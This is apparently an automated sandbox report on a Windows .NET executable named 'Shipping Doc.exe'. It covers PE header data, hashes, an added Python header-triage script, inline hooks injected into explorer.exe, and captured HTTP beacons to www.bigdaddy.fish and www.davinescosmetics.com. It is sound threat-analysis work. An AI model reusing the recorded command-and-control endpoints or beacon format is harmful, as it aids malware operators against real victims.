                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.195385958745407
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      File name:Shipping Doc.exe
                                      File size:1037312
                                      MD5:159d560ff64cdb2d130b1635f4123a49
                                      SHA1:5762036dd01f8a63ce29557c5c0464360500c7e6
                                      SHA256:065252f5ed5475c89d2bff7389554a4695a85900a7a75eb98170c6a372b33ea0
                                      SHA512:be415739b37b83d24c0d097680ddc2450be5de89f0b844c4b9790c039626f79ffac32f006b9c0febe37c84c519c703c65e03d2648c836b1f0dcd404c0026c4a6
                                      SSDEEP:24576:XB8ns9/deerxEjxbzXDusP8z5y8dWImtw:X4TuDcDImC
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H..............................~.... ........@.. .......................@............@................................

                                      File Icon

                                      Icon Hash:00828e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x4fe87e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0xAAC44811 [Thu Oct 14 14:37:05 2060 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
(followed by 97 x "add byte ptr [eax], al", which is how the disassembler renders the zero bytes that pad the rest of the preview)

The entry point is the usual 6-byte native stub of a .NET executable: an indirect jump through the single IAT slot (IMAGE_DIRECTORY_ENTRY_IAT at RVA 0x2000, size 8, so 0x402000 with image base 0x400000), which the loader fills with the address of mscoree.dll!_CorExeMain, the only import. The sample's behaviour lives in the managed code that the CLR runs afterwards, so this native disassembly says nothing about it.

                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfe830 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x5d8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x102000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

                                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xfc884 | 0xfca00 | False | 0.696450937036 | data | 7.2014231354 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x100000 | 0x5d8 | 0x600 | False | 0.4296875 | data | 4.13984531351 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x102000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
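The static PE fields tabulated in this section (the far-future compile timestamp, the CLR header in the COM_DESCRIPTOR directory, the IAT-jump entry point and the 7.2-entropy .text section) are what a triage script derives before any dynamic analysis. The script below is an added example, not code from Joe Sandbox or from the sample: it parses those PE32 headers with the standard library only and reports the same indicators. The miniature PE it builds is constructed for the demonstration, carrying the report's timestamp, image base and DLL characteristics, a `jmp dword ptr [00402000h]` stub at the entry point and a pseudo-random .text body standing in for the sample's encrypted payload; the mscoree import table is not modelled.

```python
# PE32 header triage re-deriving the static indicators tabulated above.
# Added example: not code from Joe Sandbox or from the analysed sample.
import math
import random
import struct
from datetime import datetime, timedelta, timezone

DIR_IAT, DIR_COM_DESCRIPTOR = 12, 14                      # data-directory indices
DLL_FLAGS = {0x40: "DYNAMIC_BASE", 0x100: "NX_COMPAT", 0x400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
OPT_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6   # IMAGE_OPTIONAL_HEADER32, 96 bytes
SEC_FMT = "<8sIIIIIIHHI"                                          # IMAGE_SECTION_HEADER, 40 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); packed/encrypted payloads sit above 7."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(image: bytes) -> dict:
    """Read the PE32 header fields the triage needs; raises on anything that is not PE32."""
    pe_off = struct.unpack_from("<I", image, 0x3C)[0] if image[:2] == b"MZ" else -1   # e_lfanew
    if pe_off < 0 or image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, pe_off + 4)
    opt = pe_off + 24                                              # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva, image_base = (struct.unpack_from("<I", image, opt + o)[0] for o in (16, 28))
    dll_chars = struct.unpack_from("<H", image, opt + 70)[0]
    nrva = min(struct.unpack_from("<I", image, opt + 92)[0], 16)
    dirs = [struct.unpack_from("<II", image, opt + 96 + 8 * i) for i in range(nrva)]
    dirs += [(0, 0)] * (16 - nrva)                                 # absent directories read as empty
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, *_ = struct.unpack_from(SEC_FMT, image, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize, "data": image[rawptr:rawptr + rawsize]})
    return {"timestamp": timestamp, "entry_rva": entry_rva, "image_base": image_base,
            "dll_chars": dll_chars, "dirs": dirs, "sections": sections}


def triage(image: bytes) -> dict:
    """The report's static checks: timestamp sanity, CLR header, entry-point stub, section entropy."""
    pe = parse_pe(image)
    built = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=pe["timestamp"])
    iat_rva, iat_size = pe["dirs"][DIR_IAT]
    entry_sec = next((s for s in pe["sections"]
                      if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], s["rawsize"])), None)
    entry_is_iat_jmp = False
    if entry_sec is not None:
        off = entry_sec["rawptr"] + pe["entry_rva"] - entry_sec["va"]
        stub = image[off:off + 6]
        if len(stub) == 6 and stub[:2] == b"\xff\x25":              # FF 25 = jmp dword ptr [abs32]
            target = struct.unpack("<I", stub[2:])[0] - pe["image_base"]
            entry_is_iat_jmp = iat_rva <= target < iat_rva + iat_size
    entropy = {s["name"]: round(shannon_entropy(s["data"]), 2) for s in pe["sections"]}
    return {
        "timestamp_utc": built.strftime("%Y-%m-%d %H:%M:%S"),
        "timestamp_in_future": built > datetime.now(timezone.utc),   # the report's "suspicious time stamp"
        "is_dotnet": pe["dirs"][DIR_COM_DESCRIPTOR][0] != 0,         # CLR header present
        "entry_section": entry_sec["name"] if entry_sec else None,
        "entry_is_iat_jmp": entry_is_iat_jmp,                         # shape of the _CorExeMain stub
        "dll_characteristics": [n for bit, n in sorted(DLL_FLAGS.items()) if pe["dll_chars"] & bit],
        "section_entropy": entropy,
        "high_entropy_sections": [n for n, e in entropy.items() if e > 7.0],
    }


def build_sample_pe() -> bytes:
    """Constructed miniature PE32 (not the real sample): report's timestamp, image base and DLL flags."""
    image_base, text_rva, text_size = 0x400000, 0x2000, 0x1000
    rng = random.Random(458885)                                   # fixed seed: deterministic entropy
    text = bytearray(rng.getrandbits(8) for _ in range(text_size))
    text[0:8] = bytes(8)                                          # IAT slot for _CorExeMain at RVA 0x2000
    text[0x800:0x806] = b"\xff\x25" + struct.pack("<I", image_base + text_rva)   # jmp dword ptr [00402000h]
    rsrc = b"VS_VERSION_INFO".ljust(0x200, b"\0")
    reloc = struct.pack("<III", text_rva, 0xC, 0).ljust(0x200, b"\0")
    dirs = [(0, 0)] * 16
    dirs[DIR_IAT], dirs[DIR_COM_DESCRIPTOR] = (text_rva, 8), (text_rva + 8, 0x48)
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 3, 0xAAC44811, 0, 0, 224, 0x010E)
    opt = struct.pack(OPT_FMT, 0x10B, 48, 0, text_size, 0x400, 0, text_rva + 0x800, text_rva, 0x4000,
                      image_base, 0x2000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x8000, 0x200, 0,
                      2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)

    def sec(name, va, size, rawptr, chars):
        return struct.pack(SEC_FMT, name, size, va, size, rawptr, 0, 0, 0, 0, chars)

    headers = (dos + b"PE\0\0" + file_hdr + opt
               + sec(b".text", text_rva, text_size, 0x200, 0x60000020)
               + sec(b".rsrc", 0x4000, len(rsrc), 0x1200, 0x40000040)
               + sec(b".reloc", 0x6000, len(reloc), 0x1400, 0x42000040)).ljust(0x200, b"\0")
    return headers + bytes(text) + rsrc + reloc


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key:>22}: {value}")
```

Run against a real file with `triage(open(path, "rb").read())`. The timestamp is converted from the epoch by addition rather than `fromtimestamp` so that values past 2038, like the 2060 stamp here, behave the same on every platform; the entry-point check only accepts an `FF 25` jump whose absolute operand lands inside the IAT directory, which is what distinguishes the benign CLR stub from a native entry point that merely starts with a jump.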

                                      Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x1000a0 | 0x34c | data | - | -
RT_MANIFEST | 0x1003ec | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | - | -

                                      Imports

DLL | Import
mscoree.dll | _CorExeMain

                                      Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2019
Assembly Version | 1.0.0.0
InternalName | RemotingSurroga.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | ControlLibrary
ProductVersion | 1.0.0.0
FileDescription | ControlLibrary
OriginalFilename | RemotingSurroga.exe

                                      Network Behavior

                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/03/21-20:42:09.835215 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49744 | 34.102.136.180 | 192.168.2.3

                                      Network Port Distribution

                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 3, 2021 20:41:49.096541882 CEST | 49742 | 80 | 192.168.2.3 | 208.113.204.236
Aug 3, 2021 20:41:49.208533049 CEST | 80 | 49742 | 208.113.204.236 | 192.168.2.3
Aug 3, 2021 20:41:49.208656073 CEST | 49742 | 80 | 192.168.2.3 | 208.113.204.236
Aug 3, 2021 20:41:49.208802938 CEST | 49742 | 80 | 192.168.2.3 | 208.113.204.236
Aug 3, 2021 20:41:49.320743084 CEST | 80 | 49742 | 208.113.204.236 | 192.168.2.3
Aug 3, 2021 20:41:49.321682930 CEST | 80 | 49742 | 208.113.204.236 | 192.168.2.3
Aug 3, 2021 20:41:49.321881056 CEST | 80 | 49742 | 208.113.204.236 | 192.168.2.3
Aug 3, 2021 20:41:49.321928024 CEST | 49742 | 80 | 192.168.2.3 | 208.113.204.236
Aug 3, 2021 20:41:49.321947098 CEST | 49742 | 80 | 192.168.2.3 | 208.113.204.236
Aug 3, 2021 20:41:49.433867931 CEST | 80 | 49742 | 208.113.204.236 | 192.168.2.3
Aug 3, 2021 20:42:09.702358007 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Aug 3, 2021 20:42:09.719989061 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Aug 3, 2021 20:42:09.720158100 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Aug 3, 2021 20:42:09.720345020 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Aug 3, 2021 20:42:09.738079071 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Aug 3, 2021 20:42:09.835215092 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Aug 3, 2021 20:42:09.835264921 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3
Aug 3, 2021 20:42:09.835561037 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Aug 3, 2021 20:42:09.835690022 CEST | 49744 | 80 | 192.168.2.3 | 34.102.136.180
Aug 3, 2021 20:42:09.853218079 CEST | 80 | 49744 | 34.102.136.180 | 192.168.2.3

                                      UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 3, 2021 20:40:06.545706034 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:06.570727110 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:07.272217989 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:07.310528040 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:08.516273022 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:08.540811062 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:09.286916971 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:09.320760012 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:10.395097971 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:10.419987917 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:11.509215117 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:11.541548014 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:12.723732948 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:12.750914097 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:14.740987062 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:14.773612022 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:15.797121048 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:15.829961061 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:16.690131903 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:16.715321064 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:18.600976944 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:18.637269974 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:19.751652002 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:19.786835909 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:20.660748959 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:20.688199997 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:21.508096933 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:21.535593987 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:22.683034897 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:22.717021942 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:23.486352921 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:23.511331081 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:24.316507101 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:24.343978882 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:25.550013065 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:25.578011036 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:39.483503103 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:39.524193048 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:40:41.312944889 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:40:41.345688105 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:41:00.408565998 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:41:00.441035032 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:41:02.408351898 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Aug 3, 2021 20:41:02.444238901 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Aug 3, 2021 20:41:13.484704971 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
                                      Aug 3, 2021 20:41:13.528912067 CEST53554358.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:15.833672047 CEST5071353192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:15.875015020 CEST53507138.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:42.797089100 CEST5613253192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:42.844923973 CEST53561328.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:43.193022966 CEST5898753192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:43.239955902 CEST53589878.8.8.8192.168.2.3
                                      Aug 3, 2021 20:41:48.954216957 CEST5657953192.168.2.38.8.8.8
                                      Aug 3, 2021 20:41:49.091502905 CEST53565798.8.8.8192.168.2.3
                                      Aug 3, 2021 20:42:06.128948927 CEST6063353192.168.2.38.8.8.8
                                      Aug 3, 2021 20:42:06.182670116 CEST53606338.8.8.8192.168.2.3
                                      Aug 3, 2021 20:42:09.661616087 CEST6129253192.168.2.38.8.8.8
                                      Aug 3, 2021 20:42:09.698745966 CEST53612928.8.8.8192.168.2.3

                                      DNS Queries

                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                       Aug 3, 2021 20:41:48.954216957 CEST | 192.168.2.3 | 8.8.8.8 | 0xe08b | Standard query (0) | www.bigdaddy.fish | A (IP address) | IN (0x0001)
                                       Aug 3, 2021 20:42:09.661616087 CEST | 192.168.2.3 | 8.8.8.8 | 0x9ec5 | Standard query (0) | www.davinescosmetics.com | A (IP address) | IN (0x0001)

                                      DNS Answers

                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                       Aug 3, 2021 20:41:49.091502905 CEST | 8.8.8.8 | 192.168.2.3 | 0xe08b | No error (0) | www.bigdaddy.fish | - | 208.113.204.236 | A (IP address) | IN (0x0001)
                                       Aug 3, 2021 20:42:09.698745966 CEST | 8.8.8.8 | 192.168.2.3 | 0x9ec5 | No error (0) | www.davinescosmetics.com | davinescosmetics.com | - | CNAME (Canonical name) | IN (0x0001)
                                       Aug 3, 2021 20:42:09.698745966 CEST | 8.8.8.8 | 192.168.2.3 | 0x9ec5 | No error (0) | davinescosmetics.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.bigdaddy.fish
                                      • www.davinescosmetics.com

                                      HTTP Packets

                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                       0 | 192.168.2.3 | 49742 | 208.113.204.236 | 80 | C:\Windows\explorer.exe
                                       Timestamp | kBytes transferred | Direction | Data
                                       Aug 3, 2021 20:41:49.208802938 CEST | 6582 | OUT | GET /amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR HTTP/1.1
                                      Host: www.bigdaddy.fish
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                       Aug 3, 2021 20:41:49.321682930 CEST | 6582 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Tue, 03 Aug 2021 18:41:49 GMT
                                      Server: Apache
                                      Location: http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&l8B=RjAhR
                                      Content-Length: 330
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 42 69 67 44 61 64 64 79 55 6e 6c 69 6d 69 74 65 64 2e 63 6f 6d 2f 61 6d 62 36 2f 3f 44 50 74 34 3d 62 79 34 39 6f 39 50 34 6e 62 75 54 75 4f 45 6e 32 79 38 71 33 30 51 4f 49 34 6d 43 32 57 67 52 51 50 73 54 69 4c 46 71 57 34 54 35 65 63 7a 65 58 52 56 31 4b 42 48 47 4f 41 6c 43 2b 30 48 52 35 6c 58 58 26 61 6d 70 3b 6c 38 42 3d 52 6a 41 68 52 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://BigDaddyUnlimited.com/amb6/?DPt4=by49o9P4nbuTuOEn2y8q30QOI4mC2WgRQPsTiLFqW4T5eczeXRV1KBHGOAlC+0HR5lXX&amp;l8B=RjAhR">here</a>.</p></body></html>


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                       1 | 192.168.2.3 | 49744 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                       Timestamp | kBytes transferred | Direction | Data
                                       Aug 3, 2021 20:42:09.720345020 CEST | 6593 | OUT | GET /amb6/?DPt4=ZduBhxyNf/T8KdukIHnfIOdlFHQuF1EsUtpfZKs5gLBpa2z0TfcmffP3A+e7CMLv2uy0&l8B=RjAhR HTTP/1.1
                                      Host: www.davinescosmetics.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                       Aug 3, 2021 20:42:09.835215092 CEST | 6594 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Tue, 03 Aug 2021 18:42:09 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "61048812-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                       Function Name | Hook Type | Active in Processes
                                       PeekMessageA | INLINE | explorer.exe
                                       PeekMessageW | INLINE | explorer.exe
                                       GetMessageW | INLINE | explorer.exe
                                       GetMessageA | INLINE | explorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                       Function Name | Hook Type | New Data
                                       PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE3
                                       PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE3
                                       GetMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xE3
                                       GetMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xE3

                                      Statistics

                                      Behavior

                                      System Behavior

                                      General

                                      Start time:20:40:13
                                      Start date:03/08/2021
                                      Path:C:\Users\user\Desktop\Shipping Doc.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Shipping Doc.exe'
                                      Imagebase:0x3b0000
                                      File size:1037312 bytes
                                      MD5 hash:159D560FF64CDB2D130B1635F4123A49
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:low

                                      General

                                      Start time:20:40:35
                                      Start date:03/08/2021
                                      Path:C:\Users\user\Desktop\Shipping Doc.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\Shipping Doc.exe
                                      Imagebase:0xe90000
                                      File size:1037312 bytes
                                      MD5 hash:159D560FF64CDB2D130B1635F4123A49
                                      Has elevated privileges:true
